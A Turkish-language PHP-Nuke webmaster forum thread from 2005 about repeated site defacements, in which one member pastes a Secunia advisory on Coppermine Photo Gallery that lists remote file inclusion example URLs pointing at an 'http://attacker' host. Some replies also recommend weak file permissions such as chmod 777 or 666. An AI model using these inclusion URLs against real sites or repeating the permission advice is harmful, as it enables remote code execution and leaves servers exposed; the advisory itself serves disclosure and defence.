Nuke Güvenlik

CReaTuRe · Tarih: 2005-09-19, 23:52:03 Mesaj konusu: Re: Nuke Güvenlik

o nuke un üzerindeki entegre download modülünde olmuoyr diye biliyorum bunun niçin farklı bir download modülü kuman gerekio. bu sitedki gibi istiyorsan veya farklı dosyalar bölümünde biraz arama yapabilirsin.

Bu Site Google Adsense ile Gelir Elde Ediyor · Tarih: 2024-05-02, 02:51:15 Mesaj konusu: Forum Arası Reklamlar

saho · Tarih: 2005-09-20, 09:45:02 Mesaj konusu: Re: Nuke Güvenlik

nsn gr downloads
google de arat bulursun bunu kur ayarlarında var
1 de download modulu var mgcjerry editlemesi deeplink diye de geçer

bigSty · Tarih: 2005-09-20, 12:09:59 Mesaj konusu: Re: Nuke Güvenlik

Bu sitedeki gibi download modulu istesem nsn gr download mi kurmam gerekir yani modulu o mu ? .

saho · Tarih: 2005-09-20, 12:12:57 Mesaj konusu: Re: Nuke Güvenlik

deeplink downloads a eklenti onu kurman gerek

bigSty · Tarih: 2005-09-20, 12:43:46 Mesaj konusu: Re: Nuke Güvenlik

Onu anlatabilirmisiniz.

mutluedin · Tarih: 2005-09-20, 18:07:41 Mesaj konusu: Re: Nuke Güvenlik

Bu index.php sayfasını nasıl değiştiriyorlar. Anlamıyorum. 24 saatte iki kez saldırı yapıldı ve değiştirildi. Açığın nerede olduğunu bilsem, düzelteceğim ama bilmiyorum ki?

saho · Tarih: 2005-09-20, 18:37:56 Mesaj konusu: Re: Nuke Güvenlik

modules.php ve index.php yi yeniden yazıyorlar modules.php yi tam olarak bilmiyorum

index.php yi

mesala asd/jknbdao2/45980un/xxxx.php ye at
bu yola taşı adını xxxx.php yap
daha sonra ana sayfadaki asıl index.php den oraya include yap biliyorsundur ama bilmeyenler için yazam

Evocel · Mesaj: 1+ Kayıt: Oct 18, 2004 Mesajlar: 43 Konum: Mardin

mutluedin 1 saaatte 4 kez geldi basıma chmodlarını kontrol etmeni tavsiye ederim 777 chmod bırakmadıktan sonra bisey kalmadı..

Bu Site Google Adsense ile Gelir Elde Ediyor · Tarih: 2024-05-02, 02:51:15 Mesaj konusu: Forum Arası Reklamlar

saho · Tarih: 2005-09-20, 19:22:46 Mesaj konusu: Re: Nuke Güvenlik

444 yapın index.php modules mainfale modules adını değişebilirsiniz uzaktan tek expolit le yaplıyor sanırım 1 adreste önlemi henüz alınmamış beta imiş deniyorlarmış vs.vs.

mutluedin · Tarih: 2005-09-20, 20:48:00 Mesaj konusu: Re: Nuke Güvenlik

644 kabul ediyor. 444 olmuyor

saho · Tarih: 2005-09-20, 20:59:00 Mesaj konusu: Re: Nuke Güvenlik

444 bende ama birde adını değişecem (sabaha kadar hacklarsa hacklar)

mutluedin · Tarih: 2005-09-20, 22:32:41 Mesaj konusu: Re: Nuke Güvenlik

Arkadaşlar, siteye saldıran hacker ile görüştüm. Saldırının gerçekleştiği dosya yolu şöyle: root/modules/coppermine/themes/coppercop/theme.php dosyası ile yapılıyormuş.
Bu dosyayı sildim. tekrar denemek istedi ve olmadı. yani bu dosyayı silerek açık kapandı.

bigSty · Tarih: 2005-09-20, 22:54:44 Mesaj konusu: Re: Nuke Güvenlik

hangi surum ki yoksa coppermine'nin butun surumlerinde oluyormu ?

mutluedin · Tarih: 2005-09-20, 22:59:27 Mesaj konusu: Orijinal yazı

Coppermine Photo Gallery Multiple Vulnerabilities

Secunia Advisory: SA11524
Release Date: 2004-05-03

Critical:
Highly critical
Impact: Cross Site Scripting
Exposure of sensitive information
System access

Where: From remote

Solution Status: Unpatched

Software: Coppermine Photo Gallery 1.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Janek Vind has reported multiple vulnerabilities in Coppermine Photo Gallery, allowing malicious people to compromise a vulnerable system or conduct Cross Site Scripting attacks.

1) If error messages hasn't been turned off in PHP, various scripts will return error messages if the scripts are accessed directly. This can be exploited to reveal the installation path.

2) Input passed to the "CPG_URL" parameter in the "menu.inc.php" script isn't properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML or script code in a user's browser session in context of an affected site by tricking the user into visiting a malicious website or follow a specially crafted link.

3) Various scripts fail to verify certain parameters before using them to include files. This can be exploited to include arbitrary script code from external and local resources.

Examples:
nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker
nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker
nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker
nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker

Some issues allowing administrative users to browse directories and execute system commands have also been reported.

The vulnerabilities have been reported in versions 1.2.2b and 1.2.0 RC4. Other versions may also be affected.

Issue 2 doesn't affect version 1.2.0 RC4.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Janek Vind "waraxe"

Please note: The information, which this Secunia Advisory is based upon, comes from third party unless stated otherwise.

Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.

mutluedin · Tarih: 2005-09-20, 23:01:02 Mesaj konusu: Re: Nuke Güvenlik

1.2.2b ve 1.2.0 RC4 versiyonlar etkileniyor

aslanonur · Tarih: 2005-09-21, 15:07:23 Mesaj konusu: Re: Nuke Güvenlik

HunTürk · Tarih: 2005-09-21, 15:12:53 Mesaj konusu: Re: Nuke Güvenlik

arkadaşlar yazma izini verdiğiniz modullerden daima uzak durmak gerek.işi bilen hacker yine bi yolunu bulup saldırır..

saho · Tarih: 2005-09-21, 17:46:18 Mesaj konusu: Re: Nuke Güvenlik

evet 1 de 4n-community modullerine yanaşmayın
phpbb de çok açık var hemen yeni sürüm kurup
açıkları kapamak
inş. hacklanmadan önlemleri alın en azından lamerlerden korunursunuz...

bigSty · Tarih: 2005-09-21, 17:55:24 Mesaj konusu: Re: Nuke Güvenlik

FloodGate kurdum fakat calisma sistemini anlayamadim.
Log.txt 666 yaptim Lookup'uda aynı sekilde .htaccess dosyasinida 666 yaptim.

saho · Tarih: 2005-09-21, 18:56:00 Mesaj konusu: Re: Nuke Güvenlik

header.php ye include eettiğinde her sayfa açılışında işlev yapıyor zaten

bigSty · Tarih: 2005-09-23, 13:56:13 Mesaj konusu: Re: Nuke Güvenlik

Ben forumun yonetim paneline giremiyorum dosyalar bozulmustur dedim yeniden yukledim ama olmadi dosyalardan kaynaklanmiyor sanırım.Hatada vermiyor beyaz sayfa cıkıyor.Sentinel + admin secure kurulu admin s.'den olacaginida sanmiyorum uzun suredir kurulu bir etkisini gormedim bu konuda .

saho · Tarih: 2005-09-23, 18:20:40 Mesaj konusu: Re: Nuke Güvenlik

chmood 777 yap dene
modules/forums/admin

aslanonur · Tarih: 2005-09-23, 20:23:41 Mesaj konusu: Re: Nuke Güvenlik

Arkadaşlar kesinlikle sentinel+admin secure+protector kurmayın siteniz çok yavaşlıyor NSN sentinel + admin secure kurun birde önemli olaraktan admin.php nizi saklayın modules/forums/admin in adını değiştirin sonra Saho abinin dediği gibi .htaccess ve robots.txt korumlarınıda yaptınız mı tamamdır.Kralferdi bir başlıkda anlattı sentinel ayarlarını onuda takip edin freehostunuz varsa admin secure kurmayın kasıyor

bigSty · Tarih: 2005-09-23, 20:45:16 Mesaj konusu: Re: Nuke Güvenlik

Denedim yine ayni sonuc.Beyaz bir ekran.

saho · Tarih: 2005-09-24, 19:01:14 Mesaj konusu: Re: Nuke Güvenlik

forumda bilgi bankasında bir çözüm var yoksa sentineli kaldır incelemek gerekir hatanın çözümü için bu aralar vaktim yok o kadar